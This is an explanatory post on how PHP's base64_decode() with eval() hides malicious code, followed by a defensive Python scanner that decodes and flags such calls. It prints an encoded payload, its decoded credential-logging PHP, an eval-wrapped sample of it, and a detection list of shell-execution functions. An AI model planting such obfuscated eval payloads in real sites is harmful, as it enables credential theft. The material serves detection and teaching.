PHP base64_decode: an exploiter's main weapon

PHP’s base64_encode() encodes its input as base64, and base64_decode() turns the encoded string back into the original data.

A classic example is a normal, readable string that gets encoded:

$normal = "A normal string that is readable";
$encode = base64_encode($normal);
echo $encode; // QSBub3JtYWwgc3RyaW5nIHRoYXQgaXMgcmVhZGFibGU=

Then, to decode the encoded string:

$our_string = "QSBub3JtYWwgc3RyaW5nIHRoYXQgaXMgcmVhZGFibGU=";
echo base64_decode($our_string); // A normal string that is readable

The issue is that base64_decode() combined with eval() is a common way to hide code that compromises the server, its data or its code.

In one directory of PHP exploit scripts, base64_decode was found in 31 of the files. Wphackedhelp sums it up: in WordPress code, base64_decode mostly appears when it is being used to hide malicious code.

As the example above shows, you simply have no idea what an encoded string contains; it could be a sentence or, worse, actual PHP code.

A mild example is this string:

$our_string = 'DQokZGF0YSA9ICIkaXAgJHVzZXJuYW1lICRwYXNzd29yZCAkZGIiOw0KJGYgPSBmb3BlbigibG9nLnR4dCIsICJhIik7DQpmd3JpdGUoJGYsJGRhdGEuIlxyXHJcbiIpOw0KZmNsb3NlKCRmKTs=';

Looking at it, you have no idea what it is, says or does.

echo base64_decode($our_string);

// eval(base64_decode($our_string)); // would execute the hidden code

Gives this:

$data = "$ip $username $password $db"; $f = fopen("log.txt", "a"); fwrite($f,$data."\r\r\n"); fclose($f);

// Formatted:

$data = "$ip $username $password $db";
$f = fopen("log.txt", "a");
fwrite($f, $data . "\r\r\n");
fclose($f);

Which will write those variables (if they are set) into a text file called log.txt. Of course, an attacker would also turn off error reporting and add many more common variable names to see what gets written. That is just a small achievement with base64_decode() and eval().
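To see how a defender would surface this in a theme or plugin before it runs, here is an added example (not code from the original post) that scans PHP source for base64_decode() calls, flags the ones wrapped in eval(), peels repeated encodings, and reports the recovered code together with any suspicious functions it calls. The sample PHP file is constructed for this example and embeds the two strings from the post; the function names and the SUSPICIOUS list are my own choices, not anything the post or PHP defines.

```python
"""Find base64_decode() calls in PHP source and recover what they hide.

Added example for defenders reviewing a theme or plugin; it is not code from
the original post. Function names and the SUSPICIOUS list are assumptions.
"""
import base64
import binascii
import re

# base64_decode( 'literal' ) or base64_decode( "literal" ); group 2 is the literal.
B64_CALL = re.compile(
    r"base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)", re.IGNORECASE
)
# The decode is only dangerous when something executes the result.
EVAL_BEFORE = re.compile(r"eval\s*\(\s*$", re.IGNORECASE)
B64_ALPHABET = re.compile(r"[A-Za-z0-9+/=]+")

# Functions and superglobals whose presence in recovered code deserves a look.
SUSPICIOUS = (
    "eval", "assert", "system", "exec", "shell_exec", "passthru",
    "fopen", "fwrite", "file_put_contents", "$_GET", "$_POST", "$_REQUEST",
)

# Constructed sample: one harmless decode (line 3) and one eval()-wrapped
# decode (line 4) hiding the logging snippet discussed in the post.
SAMPLE_PHP = """<?php
// Footer helper shipped with a nulled theme (constructed sample).
$title = base64_decode("QSBub3JtYWwgc3RyaW5nIHRoYXQgaXMgcmVhZGFibGU=");
eval(base64_decode('DQokZGF0YSA9ICIkaXAgJHVzZXJuYW1lICRwYXNzd29yZCAkZGIiOw0KJGYgPSBmb3BlbigibG9nLnR4dCIsICJhIik7DQpmd3JpdGUoJGYsJGRhdGEuIlxyXHJcbiIpOw0KZmNsb3NlKCRmKTs='));
"""


def decode_layers(literal, max_layers=5):
    """Decode a base64 literal, peeling off repeated encodings.

    Returns the decoded text of each layer, innermost last; an empty list
    means the literal was not valid base64 at all.
    """
    layers = []
    current = re.sub(r"\s+", "", literal)
    for _ in range(max_layers):
        if not current:
            break
        try:
            raw = base64.b64decode(current, validate=True)
        except (binascii.Error, ValueError):
            break
        text = raw.decode("utf-8", errors="replace")
        layers.append(text)
        stripped = text.strip()
        # Only keep peeling while the result itself still looks like base64.
        if (len(stripped) < 8 or len(stripped) % 4
                or not B64_ALPHABET.fullmatch(stripped)):
            break
        current = stripped
    return layers


def scan_php_source(source):
    """Return one finding per base64_decode() call, in source order."""
    findings = []
    for match in B64_CALL.finditer(source):
        # Look just before the call for an eval( wrapper.
        prefix = source[max(0, match.start() - 40):match.start()]
        evaluated = EVAL_BEFORE.search(prefix) is not None
        layers = decode_layers(match.group(2))
        recovered = layers[-1] if layers else ""
        hits = sorted(name for name in SUSPICIOUS if name in recovered)
        if evaluated and hits:
            severity = "high"
        elif evaluated:
            severity = "medium"
        else:
            severity = "low"
        findings.append({
            "line": source.count("\n", 0, match.start()) + 1,
            "evaluated": evaluated,
            "layers": len(layers),
            "recovered": recovered,
            "suspicious": hits,
            "severity": severity,
        })
    return findings


def format_report(findings):
    """Render findings as plain text, one block per decode call."""
    out = []
    for f in findings:
        out.append(f"line {f['line']}: severity={f['severity']} "
                   f"eval={f['evaluated']} layers={f['layers']} "
                   f"suspicious={','.join(f['suspicious']) or '-'}")
        out.append("  recovered: " +
                   f["recovered"].strip().replace("\n", "\n             "))
    return "\n".join(out)


if __name__ == "__main__":
    print(format_report(scan_php_source(SAMPLE_PHP)))
```

Run against a real theme directory, the same scanner would be fed each .php file's contents in turn; the point of peeling layers is that a second base64 wrapper around the first is a cheap way to defeat a grep for readable function names, and decoding first and matching afterwards closes that gap.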

Creating a PHP file and then accessing it over the web is common, as is the use of $_GET to give the attacker “customization” over certain values used in the hack.

It can be an eye-opener to see how easily, and with how much freedom, an encoded script can run on your server. All the more reason never to use nulled scripts, themes and plugins.